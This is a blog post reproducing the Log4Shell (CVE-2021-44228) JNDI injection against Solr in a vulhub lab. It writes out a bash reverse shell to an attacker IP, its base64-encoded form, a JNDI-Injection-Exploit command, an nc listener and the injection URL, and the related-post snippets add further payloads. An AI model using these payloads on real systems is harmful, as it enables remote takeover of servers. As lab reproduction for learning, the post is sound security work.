vulhub靶场log4j2漏洞复现

于 2024-09-08 22:01:09 发布
阅读量363 收藏 5
点赞数 5
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/142033996
版权

前提:

漏洞名称:Apche log4j远程代码执行漏洞

漏洞编号:CVE-2021-44228

靶场:vulhub

用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令:

docker-compose up -d 开启环境

docker ps 查看端口信息

端口开在8983,访问网站,环境搭建成功

在DNSLOG平台上获取⼀个域名来监控我们注⼊的效果

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI 项⽬地址

Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub 

反弹 shell

bash -i >& /dev/tcp/172.16.1.13/6666 0>&1 

反弹 Shell-base64 加密YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

命令模板

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.13"

服务器监听

nc -lvvp 6666

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址

http://ip地址:8983/solr/admin/cores?action=${jndi:ldap://172.16.1.13:1389/yhlt2h}

将红字替换成JDK1.8的ldap

去另外⼀个监控终端看看shell有没有弹回来且⽤whoami 命令查看权限,发现已经成功获取到root权限了。⼤功告成

[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1826
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
log4j2核弹级漏洞靶场复现(反弹shell)
m0_56773673的博客
01-04 4177
十分钟log4j2靶场漏洞复现!!!
vulhublog4j
haoaaao的博客
05-02 1331
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
Vulhub靶场-Log4j2
最新发布
weixin_69010236的博客
01-24 1301
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 2017
vulhub漏洞复现练习篇
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 3913
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
如何通过vulhub靶场复现log4j2漏洞
weixin_46683781的博客
06-11 2477
准备: 攻击机:kaili 靶机:Mac的vulhub靶场Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意
Vulhub靶场Gogs 任意用户登录漏洞复现
X_python321的博客
08-04 1250
复现踩的坑 这篇文章没准能帮你
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 3116
vulhubLog4j2:CVE-2021-44228漏洞复现
vulhubapache log4j2(CVE-2021-44228)漏洞复现
weixin_48739941的博客
04-11 1399
(1)原理:Apache Log4j 2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。该漏洞一旦被攻击者利用会造成严重危害。 (2)cd vulhub/log4j/CVE-2021-44228 切换目录。 (3)docker-compose up -d 启动。 访问:http://
LOG4J2(CVE-2021-44228)vulhub复现
kriesa的博客
07-13 1503
LOG4J2(CVE-2021-44228)vulhub复现
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1326
vulhub-log4j漏洞复现
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 3万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
Apache Log4j 复现靶场
hackzkaq的博客
12-14 3328
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 安全圈大动荡,新出现的漏洞危害性极大,此漏洞是可以执行任意代码,群里也流传了一句话:“这已经相当于黑客已经攻入计算机,可以为所欲为了“.很恐怖,一个漏洞的出现让多少人手忙脚乱。 新出了漏洞很多人都会想着去复现漏洞,为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入复现,亲测可以直接拿shell。切记要遵守网络安全法 靶场复现地址:https://hack.zkaq.cn/battle/target?id=5
Apache_log4j2(CVE-2021-44228)复现
weixin_48645404的博客
12-19 165
我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。通过DNSLog平台(http://www.dnslog.cn/)获取到域名xxx.dnslog.cn,构造payload ${jndi:ldap://http://xxx.dnslog.cn}此处kali得ip为192.168.14.131 端口设置未使用得端口 并将反弹shell进行java runtime bash 编码。端口监听到数据 并且可以进行命令执行。
Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)
我了解豹女就像农民伯伯了解大米
03-17 6102
Log4j2端口3839页面 http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1 去提交dnslog payload参数: http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn} Dnslog中检测到信息,.
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2628
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,将 Vulhub 项目克隆到本地: ``` $ git clone https://github.com/vulhub/vulhub.git $ cd vulhub ``` 3. 进入 log4j 漏洞环境目录:执行以下命令进入 log4j 漏洞环境的目录: ``` $ cd log4shell/CVE-2021-44228 ``` 4. 启动容器:执行以下命令启动容器,将漏洞环境运行起来: ``` $ docker-compose up -d ``` 5. 验证漏洞:容器启动后,你可以使用 curl 或浏览器访问 http://your-ip:8080/,将 "your-ip" 替换为容器所在主机的 IP 地址。如果返回的响应中包含 "Vulnerable" 字样,则表示漏洞存在。 请注意,这只是一个简单的漏洞环境复现示例,用于学习和实验目的。在实际情况中,你需要根据具体的情况和要求来进行漏洞测试和修复工作,并确保遵守法律和道德规范。另外,随着漏洞修复和漏洞利用工具的更新,复现步骤可能会有所变化。建议在复现之前先查阅相关的文档和资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值